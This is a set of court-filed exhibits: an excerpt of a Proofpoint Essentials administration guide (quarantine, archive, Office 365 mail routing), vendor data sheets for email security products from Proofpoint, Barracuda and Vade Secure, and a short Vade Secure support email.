1.   Click on the filter drop box.
2.   Select the appropriate action *block this address: Will create a filter and block all emails from this address for the user.*

*block this domain: Will create a filter and block all emails from this domain for the user.*

In addition to viewing details about a specific message, a user or the organization administrator can view a message that has been quarantined. This allows the user to view the content to determine if this message should be released from the Quarantine or confirmed as Spam.

*To view a specific message:*

1.   Locate the message you with to view.
2.   Click on the View button next to the message in question.

*A pop-up window will appear with the message and message header.*

*To view the header of a specific message:*

•   While the message is opened, click the arrow icon and it will expand the screen to show you the message header.

*To download a specific message:*

•   While the message is opened, click the download button and the original email message will be downloaded locally.

## Actions

There are a number of actions you can take on one or more messages in the email logs.

### Release from Quarantine

Will release the selected email(s) from the quarantine and deliver it to its intended recipient.

### Release from Quarantine

Will release the selected email(s) from the quarantine and deliver it to its intended recipient. In addition the sender will be added to the safe sender list.

### Resend (Instant Replay)

This will re-send the selected email(s) to the user.

### Not Spam

This will inform the spam engine that the selected email is not spam.

### This is Spam

This will inform the spam engine that the selected email is spam.

### Delete

This will delete the email from the logs.

*To perform an action against one or more messages:*

1.   Click on the Logs tab.
2.   Click on the Licensed Users tab.
3.   Click the user whose logs you wish to search.
4.   Choose Search Options.
5.   Click Search.
6.   Check the checkbox next to the message you wish to apply an action to.

44

Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 46 of 726

7. Click the Actions drop-down list.

8. Select the appropriate action.

9. Click Apply

# System Alerts

System alerts refer to email alerts that are generated and delivered automatically by Proofpoint. These alerts are sent to internal users who send email that is filtered by Proofpoint. System alerts are sent in the following conditions:

- An email is blocked from delivery because it contains a Virus
- An email is blocked from delivery because it contains an attachment that has been identified as malicious (Requires Attachment Defense to be enabled)
- An email is blocked from delivery because it is suspected as being spam

System alerts are sent to the internal sender. If the sender is a silent user, the alert will be sent to the administrator associated with the account. System alerts contain links to the original email, which users can use in order to view the email and release it if necessary. Emails that contain viruses or malicious attachments cannot be released.

*To temporarily disable system alerts:*

1. Locate a system alert email that you have received.

2. Click on the link that aligns to the time you wish to suspend delivery:
   - 1 hour
   - 3 hours
   - 24 hours

3. The system will disable the delivery of an alert for the time period specified.

# Accessing the Emergency Inbox

Emergency Inbox is used to provide users access to email in the event that their mail environment is unavailable. Once this occurs Proofpoint will automatically begin to spool mail for the effected domain and the emergency inbox will immediately begin to show the spooled mail. Users are able to send new messages as well as reply to received messages. Users are unable to see messages that were successfully delivered prior to mail delivery being impacted.



Once email delivery has been restored any emails that a user sent (both new and replies) will be automatically delivered to the users inbox.

*To access Emergency Inbox (User)*

1. Open a web browser and navigate to the appropriate URL.
2. Enter your login email address and password.
3. Click on the Emergency Inbox tab.

*A new window will launch. If email is being spooled than any spooled messages will be seen.*

*To send an email using Emergency Inbox:*

1. Click on the Emergency Inbox tab.
2. Click on the Create a new message icon.
3. Enter the recipient.
4. Enter the subject and message body.
5. Click the Send now icon.

*To reply to an email using Emergency Inbox:*

1. Click on the Emergency Inbox tab.
2. Click on the Reply to sender icon.
3. Enter the message body.
4. Click the Send now icon.

**Note: Only a user or their organization administrator can access their Emergency Inbox.**

# Reports

Proofpoint Essentials provides a number of reports for both administrators and users. Reports cover areas such as:

- Email Flow
- Bandwidth
- My Domains
- External Domains

Reports can be viewed in the user interface as well as printed and exported.

*To create a favorite report:*

1. Open a web browser and navigate to the appropriate URL.
2. Click on the Reports tab.
3. Select the report you wish to view.
4. Click the cog icon.
   The cog icon is located on the right hand side of the screen.
5. Select Save as Favorite.
6. Enter a name for your report.

Your favorite report is now listed on the report page and can be accessed by clicking on the report name.

*To export a report:*

1. Click on the Reports tab.
2. Select the report you wish to view.
3. Click the cog icon.
4. Choose Export Option.

*Export to PDF*

*Export to CSV*

46

Case 0:20-cv-60416-AMC   Document 3-1   Entered on FLSB Docket 02/26/2020   Page 706 of
726
Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 48 of
54

*To schedule a report for weekly delivery:*

1. Click on the Reports tab.
2. Select the report you wish to view.
3. Click the cog icon.
   The cog icon is located on the right hand side of the screen.
4. Select Save As Favorite.
5. Enter a name for your report.
6. Click on the Schedule List tab.
7. Click Add a Report Schedule.
8. Enter a description.
9. Choose frequency.
10. Enter SMTP address for delivery.
11. Select your report from the Choose a Report (based on favorites) drop-down list.
12. Click Save.

Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 49 of 54

# Archive

***In this chapter, you'll find the following topics:***

- Configuring Proofpoint Essentials Archive
- Using the Archive

## Configuring Proofpoint Essentials Archive

The Proofpoint Essentials Archive leverages the journaling capability included in Microsoft Exchange. When enabled, journaling records a copy of all internal and external email communications in your organization and sends them to a dedicated mailbox on an Exchange Server. Proofpoint Essentials supports Envelope Journaling only on Microsoft Exchange Server 2007 and 2010.

Journaling copies the body of an email message and its transport envelope information (P2 header). The envelope information includes the sender and all recipients, including BCC recipients and recipients in distribution lists. Envelope journaling presents the information in a usable format so that the Proofpoint Essentials Archive can retrieve the enveloped message and place it in the archive whereby it can then be subjected to the search and discovery functionality required.

*This guide assumes you have Journaling configured for the Exchange Server in question. For more information on Journaling configurations see: http://technet.microsoft.com/en-us/library/aa997525(EXCHG.65).aspx*

*To confirm archive is enabled:*

1. Click on the Company Settings tab.
2. Click on the Features tab.
3. Ensure Enable Proofpoint Essentials Archive checkbox is enabled.
4. Click Save.

Once the Proofpoint Essentials Archive has been enabled you now need to add a Microsoft Exchange Server to start archiving email.

To *add MS Exchange Server*

1. Click on the Archive tab.
2. Click on the Cog button in the top right hand side of the screen.
3. Navigate to the MS Exchange Servers section.
4. Click on Add New Connection.
5. Enter details about your environment.

   *Server Name: The IMAP host name that Proofpoint Essentials should connect to. Port:  The value should be 143 (IMAP).*

   *SSL Port: The value should be 993 (IMAP over SSL).*

   *Username: This account that should have permissions to access the journal account.*

   *Password: The password that belongs to the account. Connection Mode: Select SSL.*

6. Click Save.

To *test MS Exchange Server instance:*

1. Click on the Archive tab.
2. Click on the Cog in the top right hand side of the screen.
3. Navigate to the MS Exchange Servers section.
4. Click Test.

To *edit an MS Exchange Server instance:*

1. Click on the Archive tab.

2. Click on the Cog in the top right hand side of the screen.

3. Navigate to the MS Exchange Servers section.

4. Click Edit.

*To stop MS Exchange Server instance:*

1. Click on the Archive tab.

2. Click on the Cog in the top right hand side of the screen.

3. Navigate to the MS Exchange Servers section.

4. Click Stop.

*To delete MS Exchange Server instance:*

1. Click on the Archive tab.

2. Click on the Cog in the top right hand side of the screen.

3. Navigate to the MS Exchange Servers section.

4. Click Delete.

*To verify connectivity to MS Exchange Server:*

1. Click on the Archive tab.

2. Click on the Cog in the top right hand side of the screen.

3. Navigate to the MS Exchange Servers section.

4. Locate the Active icon (checkmark).

*A "checkmark" identifies proper connectivity with the MS Exchange Server. An "X" identifies a connectivity issue with the MS Exchange Server.*

# Using the Proofpoint Essentials Archive

Once the Proofpoint Essentials Archive has been enabled and an MS Exchange Server has been added successfully the archive will automatically start to collect emails from the remote server.

## Who can search the archive?

Organization administrators have permission to search the archive for all users across the organization.

End users have permission to search their own archive. This means they can only search emails where they are the sender or a recipient (either directly or as a member of a group).

*To search the archive:*

1. Click on the Archive tab.

2. Enter the appropriate criteria for your search.

*Date / From: Select the FROM date of the range you are interested in.*

*Date / To: Select the TO date of the range you are interested in.*

*Date Type: Choose either send date, received date or archived date.*

*Search By: Choose the location of the message area you wish to search; includes: Subject, Body, To, From, CC, BCC, attachment body, and attachment name.*

*Matches: Choose the relationship between the terms defined; includes: Any of these words (OR), All of these words (AND), and None of these words (NOT).*

3. Click Search.

## Viewing Search Results

Once you perform a search the system will execute the criteria against your archived data and return search results to the screen. You can further refine search criteria if necessary. There is a 1,000 record limit for search results.

Search results are displayed in a table and detailed information about each message is displayed including:

- Size (Kb)
- Sent date
- Received date
- Archive date
- From
- To
- Subject

*To view a message:*

1. Click on the **View** link next to the message in question.

*To download a message:*

1. Click on the **Download** link next to the message in question. *Downloaded emails are in EML format.*

When viewing a message you can perform multiple actions for the message in question.

*To view the list actions:*

1. Click on the Actions drop down.
2. Select desired Option.

### Redeliver

Provides users with the ability to have an archived email submitted to the Proofpoint Essentials email relay service for redelivery to each of the messages original recipients. The email will show up in the inbox of the original recipients in a matter of moments.

### Forward to

Provides users with the ability to have an archived email forwarded to a desired email address. The email will show up in the inbox as an attachment from the Proofpoint Essentials Archive system.

### Export

Provides users with the ability to have an archived email exported in an email format, which can then be managed by a Microsoft Outlook client as desired.

50

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSB Docket 02/26/2020   Page 710 of 726



# Appendix I – Configuring Office 365

## Before you Start

Before continuing with the provisioning and configuration of the Proofpoint Essentials service, it is recommended that you have the information listed below.

**Information needed for configuring Proofpoint Essentials**

- MX record(s) for domain(s) you are configuring

**Information needed for configuring Office 365**

- Proofpoint Essentials IPs
- Smart Host for Proofpoint Essentials

*Please refer to the following knowledge base article for this information:*
*http://support.proofpointessentials.com/index.php?/default_import/Knowledgebase/Article/View/75/2/proofpointessentials-data-centre-and-spf-information*

## Setup Inbound Mail Flow

Proofpoint Essentials is deployed between the customer's Office 365 environment and the Internet. Inbound mail is routed to Proofpoint Essentials by changing the customer's MX records. After email is processed by Proofpoint Essentials it is routed to Office 365.

**Configure Proofpoint Essentials**

### Locate your MX record for the domain in Office 365

1. Login to the Office 365 Admin portal.
2. Click on Domains from the left side navigation panel.
3. Select the domain you wish to manage.
4. Click Domain Settings.
5. Under Exchange Online, locate the MX row in the table from the Points to address column.
6. Keep this information readily accessible.

### Register domain with Proofpoint Essentials

*WARNING: Follow these steps to add a domain before you change your MX records for that domain. If you change your MX records before these steps are completed, you may lose mail.*

1. Open a new browser tab and login to Proofpoint Essentials.
2. Click on the Domains tab.
3. Click on Add New Domain.
4. Enter your domain name (e.g., seroom.com).
5. Select purpose (Relay).

Case 0:20-cv-60416-AMC   Document 3-1   Entered on FLSB Docket 02/26/2020   Page 711 of
726
Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 53 of
54

6.   Copy the MX row value from **the Points to address column** in the Office 365 Admin portal located previously in a separate tab.

7.   Click Save.

## Configure Office 365

You may want adjust your spam filtering policy in Office 365 to by-pass filtering for clean mail that is being sent from Proofpoint Essentials.

### By-pass Spam Filtering in Office 365

1.   Login to the Office 365 Admin portal.
2.   Click on Admin on the left side navigation panel.
3.   Click on Exchange.
4.   Click the protection link on the left side navigation panel.
5.   Click on connection filter.
6.   Click the pencil icon to edit the default connection filter.
7.   Click connection filtering.
8.   Click the + icon to add Proofpoint IP addresses to the exception list.
9.   Repeat this step for each Proofpoint IP address entry.
10.  Click Save.

You will need to create a rule to allow email to be sent from Proofpoint Essentials.

### Add a mail flow rule to only allow email from Proofpoint Essentials

1.   Login to the Office 365 Admin portal.
2.   Click on Admin on the left side navigation panel.
3.   Click on Exchange.
4.   Click the mail flow link on the left side navigation panel.
5.   Click + to access the pull down menu.
6.   Select "Restrict messages by sender or recipient..." from the pull down menu.
7.   In the new rule window, complete the required fields:
     a.   For "Name", provide a name that is descriptive such as "Enter Only accept mail from Proofpoint".
     b.   For "Apply this rule if..." select "The Sender is located..." and "Outside the organization".
     c.   For "Do the following..." select "Delete the message without notifying anyone".
     d.   Deselect the "Audit this rule with severity level" option.
     e.   For "Choose a mode for this rule" select "Enforce".
     f.   Click More options.
     g.   Click add exception.
     h.   Select "the sender IP address is in any of these ranges or exactly matches".
     i.   Add Proofpoint IP addresses to the IP address list.
     j.   Click OK.
     k.   Click Save.

# Setup Outbound Mail Flow

Proofpoint Essentials is deployed between the customer's Office 365 environment and the Internet. Outbound mail is routed to Proofpoint Essentials by setting up a connector. This will route all outbound email to Proofpoint Essentials.

Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 54 of
726

**Configure Proofpoint Essentials**

## Enable Outbound Relaying

1. Login to your Proofpoint Essentials interface.
2. Click on the Features tab.
3. Check Enable Outbound Relaying.
4. Click Save.

## Add a Sending Server

1. While logged into your Proofpoint Essentials interface, click on the Domains tab.
2. Click on Managed Hosted Services.
3. Choose Office 365.
4. Click Save.

*Proofpoint Essentials uses the latest IP ranges for Office 365 published by Microsoft.*

**Configure Office 365**

In order to configure this scenario, you must create an outbound connector that routes mail to your specified server.

1. Login to the Office 365 Admin portal.
2. Click on Admin on the left side navigation panel.
3. Click on Exchange.
4. Click the mail flow link on the left side navigation panel.
5. Click connectors.
6. Click + to access the pull down menu.
   a. For "From" select "Office 365".
   b. For "To" select "Partner Organization".
   c. Click Next.
   d. For "Name", provide a name. For "Description", provide a description.
   e. Leave the "turn it on" checked (enabled).
   f. Click Next.
   g. For "When do you want to use this connector?" select "Only when email messages are sent to these domains"
   h. Click +.
   i. Enter * to specify all domains.
   j. Click OK.
   k. Click Next.
   l. For "How do you want to route email messages? " Select "Route email through these smart hosts".
   m. Click +.
   n. Enter Proofpoint smart host value (i.e., outbound-us1.ppe-hosted.com)
   o. Click Save.
   p. Click Next.
   q. For "How should Office 365 connect to your partner organization's email server?" choose your preferred approach.

   *If you choose "Always use Transport Layer Security (TLS) to secure the connection", please choose "Any digital certificate, including self-signed certificates".*

   r. Click Next.
   s. Click Next.
   t. *In order to validate the connector you will need to add an email address to send the results to.*
   u. Click +
   v. Enter an email address.
   w. Click OK.
   x. Click Validate.

   *Use validation results to troubleshoot any configuration problems that are identified.*

   Click Save.

Case 0:20-cv-60416-XXXX   Document 3-48   Entered on FLSD Docket 02/26/2020   Page 1 of 3

# EXHIBIT 46

Case 0:20-cv-60416-XXXX   Document 3-48   Entered on FLSD Docket 02/26/2020   Page 2 of 3

**DATA SHEET**

**proofpoint.**

# PROOFPOINT ESSENTIALS URL DEFENSE
## ADVANCED PROTECTION WITH PROOFPOINT'S TARGETED ATTACK PROTECTION

### HIGHLIGHTS

- Proofpoint Essentials leverages Proofpoint's Targeted Attack Protection Technology to provide complete protection against all email threats.

- Cloud Architecture: Billions of messages traverse the Proofpoint cloud  every week, providing global visibility and early protection for emerging threats

- Advanced Protection against targeted email attacks like spear-phishing attacks, zero-day exploits, advanced persistent threats (APTs)

- Use of techniques like Dynamic Malware Analysis

- Protection across the corporate network, public network, and mobile devices

- Leverage Big Data techniques to build statistical models to provide predictive analysis

Proofpoint Essentials leverages the advanced power of Targeted Attack Protection, Proofpoint's Industry Leading email analysis solution, to provide small to mid-sized enterprises with URL Defense, the only service that effectively detects, catches and analyzes malicious URLs targeting this market.

Targeted email attacks containing malicious links represent one of the most dangerous IT threats facing enterprises today. Proofpoint Targeted Attack Protection™ is the industry's first comprehensive email analysis solution for combatting targeted threats using a full lifecycle approach, monitoring suspicious messages containing malicious URLs or malicious attachments, and observing user clicks as they attempt to reach out.

The Proofpoint Essentials URL Defense feature takes a more advanced approach to identifying suspicious email messages containing malicious URLs. This helps small to mid-sized enterprises to add additional layers of security scrutiny that cannot be matched by traditional security solutions and gateways.

### WHY DO SMALL AND MEDIUM ENTERPRISES NEED URL DEFENSE?

Small to mid-sized enterprises are easier targets for cyber criminals because they are generally protected by less sophisticated software or they are not protected at all. Unfortunately email attackers have worked this out and now realise that targeting a smaller enterprise can actually mean a bigger reward in the end.

What is worse is that no matter the training provided to staff at any enterprise, users are still falling for these targeted email attacks as they get more sophisticated. Proofpoint research has found that on average, 1 in 10 users that receive email messages with malicious URLs will click on these URLs. Frequently, Proofpoint has observed that malware used in these attacks remain undetected by less than 10% of traditional AV and reputation solutions, even hours after the attack.

#### Advanced Malware Detection
Proofpoint uses sophisticated techniques to evaluate advanced threats that are traditionally missed by signature-based and reputation-based solutions.

These techniques include:

- Malicious List Check—Check for emerging campaigns and known new malicious websites

- Code Analysis Check—Check for suspicious behavior, obfuscated scripts, malicious code snippets, and redirects to other malicious sites

DATA SHEET  |  PROOFPOINT ESSENTIALS URL DEFENSE

**Key Benefit:** Cloud scale and elasticity for malware analysis with global and immediate benefit to all organizations for emerging campaigns, with proprietary technology to defeat malware through counter-evasion techniques.

### Real-time Dynamic Analysis

Proofpoint enables the solution to provide protection on any device, at any time, from any location, by following the email and checking for the URL destination's safety in real-time. A frequent technique used by hackers has been to drive recipients to click on a link directing them to a website which is initially harmless but turns malicious after a period of time. With this feature, users are still protected: whether they access the message from the corporate network, home network, mobile device, or a public network.

- Protects users and organizations on and off the corporate VPN across all devices including Mobile, Tablet and Laptops.
- Architected to help comply with existing corporate security controls and acceptable use policies by redirecting the user's browser to safe destinations rather than acting like a proxy service.

**Key Benefit:** Enables security controls to persist, even if users are off the corporate network and bypassing on-premise security controls.

**ABOUT PROOFPOINT**
Proofpoint, Inc. (NASDAQ:PFPT), a next-generation cybersecurity company, enables organizations to protect the way their people work today from advanced threats and compliance risks. Proofpoint helps cybersecurity professionals protect their users from the advanced attacks that target them (via email, mobile apps, and social media), protect the critical information people create, and equip their teams with the right intelligence and tools to respond quickly when things go wrong. Leading organizations of all sizes, including over 50 percent of the Fortune 100, rely on Proofpoint solutions, which are built for today's mobile and social-enabled IT environments and leverage both the power of the cloud and a big-data-driven analytics platform to combat modern advanced threats.

©Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners.

**proofpoint.**   proofpoint.com

# EXHIBIT 47

Case 0:20-cv-60416-XXXX   Document 3-19 Entered on FLSD Docket 02/26/2020 Page 717 of

# Microsoft Office 365 and Proofpoint

## Securing Your Investment in Cloud Collaboration

If your organization is like most, migrating to Microsoft Office 365 is on your 12– or 24–month roadmap. Outside of questions around core functionality, the most common inquiries about the service are around data protection and service availability, including topics such as access control, data at rest encryption, disaster recovery and compliance readiness to name a few.

As a prospective customer of Office 365, exhaustive due diligence in three key areas is required, including:

» **Data center security & compliance:** physical, logical and data security precautions taken by Microsoft

» **Secure and compliant data flow:** protection against advanced threats and targeted attacks—both of which are primary sources of data loss and breach

» **Email service availability:** an insurance policy against outages that ensures around–the–clock access to business critical email



## Data Center & Infrastructure Protection and Procedures

Microsoft has taken exhaustive precautions to ensure that data center security and compliance requirements are met. As discussed in its Office 365 Trust Center, its datacenters are purpose–built to earn your trust and assure you that security, privacy, compliance and operations are top of mind.

## How Proofpoint Extends Office 365 for Advanced Protection & Guaranteed Email Availability

Proofpoint extends Office 365's secure data centers with its industry–leading suite of products including Proofpoint Enterprise Protection, Targeted Attack Protection and Email Continuity.

### Proofpoint Provides Complete Protection for your Office 365 Deployment

» Provides complete protection against advanced threats with URL Defense Service and Attachment Defense Service

» Ensures around–the–clock availability of mission critical email with Enterprise Continuity

» Ensures complete control and visibility into message flow

Case 0:20-cv-60416-XXXC   Document 3-19 Entered on FLSD Docket 02/26/2020   Page 3 of 3

**proofpoint** | Whitepaper | Securing Your Investment in Cloud Collaboration                                    2

Here's how Proofpoint can help:

| Advanced threat protection | Proofpoint Targeted Attack Protection provides exhaustive protection against zero-day and polymorphic threats attempting to penetrate your perimeter through email. Microsoft ensures that its datacenters are kept secure, and Proofpoint ensures that the data flowing through the service and into your environment is kept free of breach-causing sophisticated malware that often goes undetected. |
|---|---|
| | It extends Office 365 with: |
| | » URL re-writing |
| | » Static and dynamic analysis for URLs and attachments |
| | » Granular visibility into who clicked what, and where the click happened |
| Email continuity | Proofpoint Enterprise Continuity ensures around-the-clock availability of email flowing into your Office 365 environment. In the event of any sort of outage—be it on Microsoft's side or an authentication issue on yours—email can be readily accessed directly within Microsoft Outlook. |
| | It extends Office 365 with: |
| | » 30-day rolling inbox |
| | » Always-on email continuity |
| | » Automated system restoration flushes messages back into Office 365 upon recovery |
| | » Simple Outlook integration |
| Granular administrative control | Proofpoint Enterprise Protection provides a rich set of policy options to enable fine-tuning of routing, handling and security rules. From administrator-level customization of policies based on users, groups, or domains to end-user self-service to adjust receiving preferences, Proofpoint enables security and flexibility. |
| | It extends Office 365 with: |
| | » SmartSearch technology enables rapid message tracing and tracking for remediation |
| | » Administrator filter customization ensures that all filter policies can be customized at a global, group, or user level—with full integration with Office 365's directory services |
| | » Powerful message routing built on top of the commercial version of Sendmail, the world's most widely used MTA |

The Proofpoint Security and Compliance Suite helps organizations to accelerate adoption of Office 365, stop phishing attacks and comply with global regulations. Our solutions provide the additional layer of advanced threat protection, compliance and eDiscovery functionality to enable organizations of all sizes to take full advantage of the benefits of Office 365.

**About Proofpoint**
Proofpoint Inc. (NASDAQ:PFPT) is a leading security-as-a-service provider that focuses on cloud-based solutions for threat protection, compliance, archiving & governance, and secure communications. Organizations around the world depend on Proofpoint's expertise, patented technologies and on-demand delivery system to protect against phishing, malware and spam, safeguard privacy, encrypt sensitive information, and archive and govern messages and critical enterprise information.

©Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners.

Case 0:20-cv-60416-XXXX   Document 3-50   Entered on FLSD Docket 02/26/2020   Page 1 of 3

# EXHIBIT 48

Case 0:20-cv-60416-XXXX   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 720 of 726

# Barracuda
# Essentials for Email Security

Comprehensive security and data protection for email

In today's complex cyber-threat environment, you need an email security and compliance solution that delivers comprehensive security against sophisticated attacks while also being easy to deploy, configure, and manage. Barracuda Essentials for Email Security provides complete, cloud-based protection against advanced targeted attacks, helps ensure email continuity, scans outgoing email to prevent data loss, and creates unalterable email archives—all without the need to install any additional hardware or software.

## Comprehensive email threat protection

Barracuda Email Security Service protects against phishing, malware, ransomware, and other sophisticated, email-borne threats. Its multi-layered, cloud-hosted scanning engines include Barracuda Advanced Threat Protection, which combines behavioral, heuristic, and sandboxing technologies.

This lets it protect your infrastructure against zero-hour, targeted attacks and ransomware variants like Locky and CryptoLocker. It automatically scans email attachments in real time; suspicious attachments are detonated in a sandbox environment to observe behavior. Link protection redirects suspicious and typosquatted URLs to protect email recipients against inadvertent malware downloads.

## Archiving for compliance

Barracuda Cloud Email Archiving Service integrates with Exchange and other cloud-based email services like G Suite to create a cloud-based, indexed archive. It allows granular retention policies, extensive search, role-based auditing/permissions, legal hold, and export. It makes it easy to comply with e-discovery requests and regulatory or policy retention requirements.

Litigation hold ensures that email cannot be altered or deleted until the litigation hold expires or is removed. Native and mobile apps provide intuitive interfaces that simplify search to ensure messages are found easily, even when email services are unavailable. An Outlook Add-in lets users transparently search across both mailboxes and archives, enabling greater productivity.

## Ensuring business continuity

Barracuda Email Continuity ensures that email can still be delivered during email outages or loss of connectivity. Email operations continue by failing over to a cloud-based email service in the event primary email services become unavailable.

## Key Features

**Email Security**

- Cloud-based protection against:
  - Spam
  - Email-borne viruses (inbound and outbound)
  - Email-based malware
  - Phishing emails
  - Undelivered emails
  - Unsecured emails
  - Denial-of-Service attacks
- Advanced Threat Protection using full-system emulation sandbox
- Agentless email encryption
- Link and URL protection against typosquatting
- Integrated end-user training and exercises to help identify advanced threats

**Continuity**

- Failover to cloud-based email service to continue operations
- Provides email continuity for up to 96 hours
- Emergency mailbox allows users to send, receive, read, and respond to email

**Archiving**

- Archive directly from Exchange and cloud-based email services like G Suite to cloud-based archive
- PST management for legacy email
- Granular retention policies
- Native and mobile apps for easy access
- Full text search with multiple accessors
- Legal hold

**PST Management**

- Locates PST files wherever they exist
- Determines ownership intelligently based on content
- Discovers all PST files regardless of location and state
- Zero footprint client minimizes impact on end users
- Parallel processing avoids throttling and improves performance
- Minimizes network impact by migration directly to archive
- Selective processing migrates only data that is needed

**Web-Based Management**

- Managed via Barracuda Cloud Control
- Convenient configuration and management
- Web-based management portal
- LDAP and multi-factor authentication
- Centrally manage security policies
- Access reports from any location
- Mobile applications
- Mixed-mode for managing existing Barracuda products

**Secure Cloud Data Centers**

- AES 256-bit encryption at rest and in transit
- Public key cryptography (RSA 1024)
- Isolated customer metadata databases
- Redundant storage (geographic or within colo)
- Data stored in-country (based on colo)
- Tier 3 & 4 data centers
- SSAE 16 or SOC audited data centers

| EMAIL SECURITY | ADVANCED EMAIL SECURITY AND COMPLIANCE |
|---|---|
| Email Security Service | Email Security Service |
| Data Loss Prevention | Data Loss Prevention |
| Encryption | Encryption |
| Advanced Threat Protection | Advanced Threat Protection |
|  | Cloud Archiving Service |
|  | PST Management* |

*90 day version only.



DATASHEET • US 2.0 • Copyright 2019 Barracuda Networks, Inc. • 3175 S. Winchester Blvd., Campbell, CA 95008 • 408-342-5400/888-268-4772 (US & Canada) • barracuda.com
Barracuda Networks and the Barracuda Networks logo are registered trademarks of Barracuda Networks, Inc. in the United States. All other names are the property of their respective owners.

Case 0:20-cv-60416-XXXX   Document 3-51   Entered on FLSD Docket 02/26/2020   Page 1 of 3

# EXHIBIT 49



Case 0:20-cv-60416-XXXX Document 3-1 Entered on FLSD Docket 02/26/2020 Page 2 of 3 726

# Anti-Phishing Solution:
# The Real Time Protection

Phishing is the preferred technique to compromise corporate IT.
According to Verizon, at least 91% of IT breaches involved phishing in year 2015.

Users are unable to differentiate legitimate emails from fraudulent ones, phishing has become a trend.

Vade Secure's Anti-Phishing solution **combines an individual behavioral email analysis with a real time links exploration at the Time-Of-Click** to ensure an overall safety of the messaging system.

## SECURITY BEFORE, DURING, AND AFTER THE ATTACK



### Eliminate the threat **before** it arrives

**This technology identifies threats from the first email in zero-day.** The filter operates a behavioral analysis of each email, including the header, attached files, links and structure. This step recognizes most phishing patterns and quickly eliminate the threat even on low volume waves.

### Explore links **during** the wave

**Links are explored during the filtering process to determinate the harmlessness of the webpage.** Vade Secure's exploration engine is based on heuristic technology coupled with machine learning that detects fake pages aimed at deceiving users.

### Double check **after** the email is received

**Links are explored during the filtering process to determinate the harmlessness of the webpage.** Vade Secure's exploration engine is based on heuristic technology coupled with machine learning that detects fake pages aimed at deceiving users.

## REAL TIME PHISHING PROTECTION

**The most comprehensive Anti-Phishing solution on the market.** With the rise in phishing attacks in both volume and sophistication, users are unable to recognize most advanced phishing emails.

With Vade Secure's Anti-Phishing solution, **your users are protected at the most critical step:** at the time-of-click.



From 2013 to 2015

**+186%**

of recieved and reported phishing campaigns

APWG 2015

## BRAND & HOST ALERT: A TEAMWORK

**Being a global email security company,** Vade Secure shares data with organizations involved in phishing. Our community is composed of financial institution, ISPs, worldwide brands, hosting companies and web browsers

## SOLUTION AVAILABLE AS A PLUGIN, GATEWAY OR CLOUD SERVICE

Vade Secure's Anti-phishing is available as a Plugin to complement your Anti-Spam solution, in a Gateway or as a Cloud Service in our email filtering kit which includes Anti-Phishing and Spear-Phishing, Anti-Malware and Anti-Spam.

As an On-Premise Solution



As a Cloud Service

**Vade Secure** Cloud



76
countries

400M
protected mailboxes

more than
4000
customers

95%
renewal rate

**USA - CANADA - FRANCE - HONG KONG - JAPAN**
Language-independent technology

**Vade Secure**
180 Sansome Street, Floor 8, 94104, San Francisco, CA - USA

Contact: sales@vadesecure.com - www.vadesecure.com


Predictive Email Defense

# EXHIBIT 50

Hi,

The main difference about "Time Of Click" for Vade Secure and Safe link is that we are using our own databases of malicious URLs. These databases are updated every minute. So you you don't have to create some rules and enter manually some urls to be protected.

You can have a look at our website : https://www.vadesecure.com/en/solutions/anti-phishing-2/

And also you can check our antiphishing dedicated website : http://www.isitphishing.org

Regards
Olivier Saoletti
Support team | support@vadesecure.com

Redacted

Jun 14, 00:34 CEST

What is the advantage of your 'time of click' phishing security vs Microsoft's 'time of click' safe links? This will help in assessing your product offering. Thank you.

_____

Submitted from: https://www.vadesecure.com/en/support/